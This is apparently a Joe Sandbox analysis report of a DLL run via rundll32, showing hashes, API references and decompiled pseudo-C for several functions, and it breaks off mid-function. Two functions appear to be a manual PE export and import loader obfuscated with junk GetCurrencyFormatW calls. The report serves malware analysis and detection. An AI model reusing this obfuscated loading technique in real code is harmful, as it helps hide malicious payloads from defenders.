DrawIcon.USER32 ref: 10003827

Part of subcall function 100101D0: __EH_prolog3.LIBCMT ref: 100101D7
Part of subcall function 100101D0: EndPaint.USER32(?,?,00000004,100079D4,?,?,00000058,10003840), ref: 100101F2

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: H_prolog3MetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
String ID:
API String ID: 2914073315-0
Opcode ID: 1e7be54cfa6d3c1e1a4138fbb5d3b695b42003d303c7effa8fdb7e59f0e8d856
Instruction ID: d120da58dcfcd53bd7750bb53c5c236feb3430fa3c37942b0e1c20916eef10ca
Opcode Fuzzy Hash: 1e7be54cfa6d3c1e1a4138fbb5d3b695b42003d303c7effa8fdb7e59f0e8d856
Instruction Fuzzy Hash: 11112131A00219AFDB01DFB8CD499AEBBB9FB49704F004128F546DB165DA60A905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10005CE3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70
libraryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E10005CE3(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __esi;
				void* __ebp;
				signed int _t9;
				intOrPtr* _t18;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t34;
				void* _t35;
				signed int _t36;
				void* _t37;

				_t33 = __edi;
				_t32 = __edx;
				_t28 = __ecx;
				_t26 = __ebx;
				_t9 =  *0x10045580; // 0x2ef01728
				_v8 = _t9 ^ _t36;
				_t39 = _a4 - 0x800;
				_t35 = __ecx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					_push(E10020E9D(__edx,  &_v288, 4, "LOC"));
					E10001000(__ebx, _t28, __edi, _t35);
					_t37 = _t37 + 0x10;
					L2:
					_push(_t26);
					_push(_t33);
					_t34 =  *(E10020B71(_t39));
					 *(E10020B71(_t39)) =  *_t14 & 0x00000000;
					_t35 = 0x112;
					_t27 = E10020F1E( &_v284, 0x112, 0x111, 0x112,  &_v288);
					_t18 = E10020B71(_t39);
					_t40 =  *_t18;
					if( *_t18 == 0) {
						 *(E10020B71(__eflags)) = _t34;
					} else {
						E10005177( *((intOrPtr*)(E10020B71(_t40))));
					}
					if(_t27 == 0xffffffff || _t27 >= _t35) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
					_pop(_t33);
					_pop(_t26);
				}
				return E1001FBB5(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
			}

APIs

_strcpy_s.LIBCMT ref: 10005D10

Part of subcall function 10001000: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10001000: __EH_prolog3.LIBCMT ref: 10004E8F

Part of subcall function 10020B71: __getptd_noexit.LIBCMT ref: 10020B71

__snprintf_s.LIBCMT ref: 10005D49

Part of subcall function 10020F1E: __vsnprintf_s_l.LIBCMT ref: 10020F33

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10005D74
LoadLibraryA.KERNEL32(?), ref: 10005D97

Strings

LOC, xrefs: 10005D08

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8H_prolog3InfoLibraryLoadLocaleThrow__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
String ID: LOC
API String ID: 4018564869-519433814
Opcode ID: 4f0d158bbcc9af0cb7d9660866c3b5ed689d3bebe7d48719b60939431f1f056f
Instruction ID: a9d45852776f355f9b5d50c5a058e6740ec097f8b3d9f9fbd80e36b8e0c44140
Opcode Fuzzy Hash: 4f0d158bbcc9af0cb7d9660866c3b5ed689d3bebe7d48719b60939431f1f056f
Instruction Fuzzy Hash: F9113A35900208AFE732D764DC4BBDF76ACDF04396F5104A3F6059B0A6DB716D448661

Uniqueness

Uniqueness Score: -1.00%

Function 1001FBB5 Relevance: 7.6, APIs: 5, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E1001FBB5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x10045580; // 0x2ef01728
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x10048ee8 = _t6;
				 *0x10048ee4 = _t22;
				 *0x10048ee0 = _t25;
				 *0x10048edc = _t21;
				 *0x10048ed8 = _t27;
				 *0x10048ed4 = _t26;
				 *0x10048f00 = ss;
				 *0x10048ef4 = cs;
				 *0x10048ed0 = ds;
				 *0x10048ecc = es;
				 *0x10048ec8 = fs;
				 *0x10048ec4 = gs;
				asm("pushfd");
				_pop( *0x10048ef8);
				 *0x10048eec =  *_t31;
				 *0x10048ef0 = _v0;
				 *0x10048efc =  &_a4;
				 *0x10048e38 = 0x10001;
				_t11 =  *0x10048ef0; // 0x0
				 *0x10048dec = _t11;
				 *0x10048de0 = 0xc0000409;
				 *0x10048de4 = 1;
				_t12 =  *0x10045580; // 0x2ef01728
				_v812 = _t12;
				_t13 =  *0x10045584; // 0xd10fe8d7
				_v808 = _t13;
				 *0x10048e30 = IsDebuggerPresent();
				_push(1);
				E1002CAF6(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x10039e30);
				if( *0x10048e30 == 0) {
					_push(1);
					E1002CAF6(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

APIs

IsDebuggerPresent.KERNEL32 ref: 10026335
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1002634A
UnhandledExceptionFilter.KERNEL32(10039E30), ref: 10026355
GetCurrentProcess.KERNEL32(C0000409), ref: 10026371
TerminateProcess.KERNEL32(00000000), ref: 10026378

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 01d0eb0c0dcaba5af3b0515de7aff01423ec1db4b762333c52675aa0d91e68a1
Instruction ID: 5ceda17ef6beca13f91ed3eb6d695352f2d28ceca655d5ac6984320e078a27cc
Opcode Fuzzy Hash: 01d0eb0c0dcaba5af3b0515de7aff01423ec1db4b762333c52675aa0d91e68a1
Instruction Fuzzy Hash: FF21F274810225DFF741EF2ADEC46593BB4FB0A305F40481AEA08CB662E7B15A85CF0D

Uniqueness

Uniqueness Score: -1.00%

Function 1000ACED Relevance: 6.0, APIs: 4, Instructions: 41
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000ACED(void* __ecx) {
				void* __ebx;
				void* __edi;
				signed int _t5;
				void* _t15;
				void* _t18;
				void* _t19;

				_t15 = __ecx;
				if((E1000EEC4(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E1000A84C(_t15, _t15, _t18, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E10005CAE();
				if(_t19 == 0) {
					goto L6;
				}
				_t18 = GetKeyState;
				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}

0x1000acf0
0x1000acfc
0x1000ad44
0x1000ad46
0x1000ad4d
0x00000000
0x1000ad4f
0x1000ad03
0x1000ad07
0x00000000
0x00000000
0x1000ad09
0x1000ad16
0x00000000
0x1000ad2a
0x1000ad39
0x00000000
0x1000ad41

APIs

Part of subcall function 1000EEC4: GetWindowLongA.USER32 ref: 1000EECF

GetKeyState.USER32 ref: 1000AD11
GetKeyState.USER32 ref: 1000AD1A
GetKeyState.USER32 ref: 1000AD23
SendMessageA.USER32 ref: 1000AD39

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: a3e213466f0cc79bb1ea557e72bfa32ef1c8a60120fac16cfa118bb559ebee9b
Instruction ID: eef2aa2a50f2ce3d6a27787399a9e196b8ce042d27520782e3c7ec791ce6f79c
Opcode Fuzzy Hash: a3e213466f0cc79bb1ea557e72bfa32ef1c8a60120fac16cfa118bb559ebee9b
Instruction Fuzzy Hash: F9F089B678039B1BF550B2748C41F952154CF4ABD6F010731B643EE4DACD65D8C15670

Uniqueness

Uniqueness Score: -1.00%

Function 10003122 Relevance: 59.9, APIs: 32, Strings: 2, Instructions: 377
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E10003122(signed int _a4, signed short _a8) {
				signed int _v4;
				void* _v8;
				intOrPtr* _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t113;
				signed int _t124;
				intOrPtr _t125;
				int _t129;
				signed int _t130;
				signed int _t133;
				void* _t140;
				signed int _t141;
				void* _t173;
				signed int _t177;
				signed int _t184;
				intOrPtr* _t186;
				signed int _t196;
				signed int _t197;
				short* _t198;
				void* _t238;

				_t238 =  &_v24;
				_t198 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v20 =  *((intOrPtr*)(_a4 + 4));
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0;
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + _v4;
				_t113 =  *_a4 + 0x78 + (GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + _v4) * 8;
				_v8 = _t113;
				if( *((intOrPtr*)(_t113 + 4)) == 0) {
					L16:
					return 0;
				}
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) * 0x28;
				_v24 = (GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) + _v4) *  *0x100440d0 +  *_v8 + _v20;
				if( *(_v24 + 0x18) == GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4) {
					goto L16;
				}
				_t124 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
				_t125 = _v24;
				if( *((intOrPtr*)(_t125 + 0x14)) == _t124 *  *0x100440e0) {
					goto L16;
				}
				_push(0x22b9);
				_push(L"xadqsavcbdfewescGADW");
				_push(0);
				_push(_t198);
				_push(0x11d4);
				_push(0);
				if(_a8 >> 0x10 != 0) {
					if(GetCurrencyFormatW() *  *0x100440d4 + (0 |  *(_v24 + 0x18) == 0x00000000) != 0) {
						goto L16;
					}
					_t129 = 0;
					if( *(_a4 + 0x30) != 0) {
						L12:
						_t130 = GetCurrencyFormatW(_t129, 0x11d4, _t198, _t129, L"xadqsavcbdfewescGADW", 0x22b9);
						_t133 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_t140 = bsearch(_t238 + 0x40 + GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 * 4,  *(_a4 + 0x30), _t133 *  *0x100440d4 +  *(_v24 + 0x18), _t130 *  *0x100440d4 + 8, E1000310E);
						if(_t140 == 0) {
							goto L16;
						}
						_t141 =  *(_t140 + 4) & 0x0000ffff;
						L14:
						_a4 = _t141;
						if(_a4 > GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v24 + 0x14))) {
							goto L16;
						}
						return  *((intOrPtr*)(GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_v24 + 0x1c)) + _v20 + _a4 * 4)) + _v20;
					}
					_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 << 2;
					_v16 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v24 + 0x20)) + _v4 + _v20;
					_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 + GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8;
					_v12 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 +  *((intOrPtr*)(_v24 + 0x24)) + _v4 + _v20;
					_v4 = malloc(GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *(_v24 + 0x18) * 8);
					_t173 = _v4 + GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc * 8;
					_v8 = _t173;
					 *(_a4 + 0x30) = _t173;
					if(_t173 == 0) {
						goto L16;
					}
					_v4 = _v4 & 0x00000000;
					if(GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *(_v24 + 0x18) == 0) {
						L11:
						_t177 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						qsort( *(_a4 + 0x30), GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc +  *(_v24 + 0x18), _t177 *  *0x100440d8 + 8, E100030AA);
						_t238 = _t238 + 0x10;
						_t129 = 0;
						goto L12;
					} else {
						goto L10;
					}
					do {
						L10:
						_t184 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_t186 = _v8;
						 *_t186 = _t184 *  *0x100440dc + _v20 +  *_v16;
						 *((short*)(_t186 + 4)) =  *_v12;
						GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_v4 = _v4 + 1;
						GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_v16 = _v16 + 4;
						GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_v12 = _v12 + 2;
						GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_v8 = _v8 + 8;
					} while (_v4 < GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *(_v24 + 0x18));
					goto L11;
				}
				_a4 =  *((intOrPtr*)(_t125 + 0x10));
				_v4 = _a8 & 0x0000ffff;
				_t196 = GetCurrencyFormatW(??, ??, ??, ??, ??, ??);
				_t197 = _v4;
				if(_t197 < _t196 *  *0x100440d0 + _a4) {
					goto L16;
				}
				_t141 = _t197 - _a4;
				goto L14;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 10003155
GetCurrencyFormatW.KERNEL32 ref: 1000316E
GetCurrencyFormatW.KERNEL32 ref: 1000318B
GetCurrencyFormatW.KERNEL32 ref: 100031BB
GetCurrencyFormatW.KERNEL32 ref: 100031D0
GetCurrencyFormatW.KERNEL32 ref: 100031F7
GetCurrencyFormatW.KERNEL32 ref: 10003219
GetCurrencyFormatW.KERNEL32 ref: 10003259
GetCurrencyFormatW.KERNEL32 ref: 1000327D
GetCurrencyFormatW.KERNEL32 ref: 100032B3
GetCurrencyFormatW.KERNEL32 ref: 100032CF
GetCurrencyFormatW.KERNEL32 ref: 100032F7
GetCurrencyFormatW.KERNEL32 ref: 10003312
GetCurrencyFormatW.KERNEL32 ref: 1000333A
malloc.MSVCRT ref: 1000334E
GetCurrencyFormatW.KERNEL32 ref: 10003365
GetCurrencyFormatW.KERNEL32 ref: 10003399
GetCurrencyFormatW.KERNEL32 ref: 1000351A
GetCurrencyFormatW.KERNEL32 ref: 1000353C

Strings

xadqsavcbdfewescGADW, xrefs: 1000313C, 1000315F, 1000317C, 100031B2, 100031C1, 100031E8, 1000320E, 10003236, 100032AA, 100032BD, 100032E4, 10003301, 10003327, 10003356, 1000338E, 100033B0, 100033D5, 100033F4, 10003407, 1000341A, 1000342D, 10003458, 10003471, 100034A5, 100034BC, 100034E0, 1000350B, 10003531
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10003143, 10003148, 10003166, 10003183, 100031B8, 100031C8, 100031EF, 10003215, 1000323D, 100032B0, 100032C4, 100032EF, 10003308, 10003332, 1000335D, 10003395, 100033B7, 100033E5, 100033FB, 1000340E, 10003421, 10003434, 1000345F, 10003478, 100034AB, 100034C3, 100034E7, 10003512, 10003538

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrencyFormat$malloc
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3897936752-3161301136
Opcode ID: ad4306dd0e1101c6acc404a6b929437f6ac9df0eb58d4d58c0bece070a968090
Instruction ID: 34db2b080b93b1a5fa06b343cb693385c3cc97db3aa9a73273c3b7a7a01e4154
Opcode Fuzzy Hash: ad4306dd0e1101c6acc404a6b929437f6ac9df0eb58d4d58c0bece070a968090
Instruction Fuzzy Hash: 95C14670604214BFE208DB51CD96F5BBBECEB8A789F01480EF7459B2A2C731E9148F65

Uniqueness

Uniqueness Score: -1.00%

Function 10002BDE Relevance: 52.9, APIs: 28, Strings: 2, Instructions: 381
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E10002BDE(intOrPtr* _a4) {
				int _v4;
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int* _v20;
				void* _v24;
				signed int _t121;
				signed int _t144;
				void* _t156;
				intOrPtr _t157;
				void* _t178;
				signed int _t184;
				intOrPtr _t189;
				intOrPtr _t192;
				short* _t218;
				intOrPtr _t246;
				intOrPtr* _t247;
				int _t256;
				void** _t257;

				_t257 =  &_v24;
				_t256 = 0x22b9;
				_t218 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v16 =  *((intOrPtr*)(_a4 + 4));
				_v4 = 1;
				_v8 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8;
				_v8 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + _v8;
				_t121 =  *_a4 + 0x80 + (GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + _v8) * 8;
				_v8 = _t121;
				if( *((intOrPtr*)(_t121 + 4)) != 0) {
					_v12 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 * 0x14;
					_v24 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 +  *_v8 + _v12 + _v16;
					L20:
					while(IsBadHugeReadPtr(_v24, GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440dc + 0x14) == 0) {
						if(GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440d4 +  *((intOrPtr*)(_v24 + 0xc)) == 0) {
							L26:
							return _v4;
						}
						_t144 =  *((intOrPtr*)(_a4 + 0x24))(GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440dc +  *((intOrPtr*)(_v24 + 0xc)) + _v16,  *((intOrPtr*)(_a4 + 0x34)));
						_v8 = _t144;
						if(_t144 == 0) {
							_v4 = 0;
							goto L26;
						}
						_v12 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440cc +  *((intOrPtr*)(_a4 + 0xc)) + 1;
						_v12 = realloc( *(_a4 + 8), (GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440d0 + 4) * _v12);
						_t156 = _v12 + GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440e0 * 4;
						if(_t156 == 0) {
							_t157 = _a4;
							 *((intOrPtr*)(_t157 + 0x2c))(_v8,  *((intOrPtr*)(_t157 + 0x34)));
							_v4 = _v4 & 0x00000000;
							L25:
							goto L26;
						}
						_t256 = 0x22b9;
						 *(_a4 + 8) = _t156;
						 *((intOrPtr*)( *(_a4 + 8) + (GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_a4 + 0xc))) * 4)) = _v8;
						 *((intOrPtr*)(_a4 + 0xc)) =  *((intOrPtr*)(_a4 + 0xc)) + 1;
						_push(0x22b9);
						_push(L"xadqsavcbdfewescGADW");
						_push(0);
						_push(_t218);
						_push(0x11d4);
						_push(0);
						if( *_v24 == 0) {
							_v12 = GetCurrencyFormatW() *  *0x100440e0 << 2;
							_v20 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_v24 + 0x10)) + _v12 + _v16;
							_v12 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc << 2;
							_t178 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 +  *((intOrPtr*)(_v24 + 0x10)) + _v12;
						} else {
							_v12 = GetCurrencyFormatW() *  *0x100440d0 << 2;
							_v20 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  *_v24 + _v12 + _v16;
							_v12 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 << 2;
							_t178 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v24 + 0x10)) + _v12;
						}
						_v12 = _t178 + _v16;
						while( *_v20 != 0) {
							if(GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440e0 + ( *_v20 >> 0x1f) == 0) {
								_t184 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256);
								_t246 = _a4;
								_t189 =  *((intOrPtr*)(_t246 + 0x28))(_v8, _t184 *  *0x100440e0 + _v16 +  *_v20 + 2,  *((intOrPtr*)(_t246 + 0x34)));
							} else {
								_t189 =  *((intOrPtr*)(_a4 + 0x28))(_v8, GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440d0 + ( *_v20 & 0x0000ffff),  *((intOrPtr*)(_a4 + 0x34)));
							}
							_t247 = _v12;
							 *_t247 = _t189;
							_t257 =  &(_t257[3]);
							if( *_t247 == 0) {
								_v4 = 0;
								L18:
								if(_v4 == 0) {
									_t192 = _a4;
									 *((intOrPtr*)(_t192 + 0x2c))(_v8,  *((intOrPtr*)(_t192 + 0x34)));
									goto L25;
								}
								GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256);
								_v24 = _v24 + 0x14;
								goto L20;
							} else {
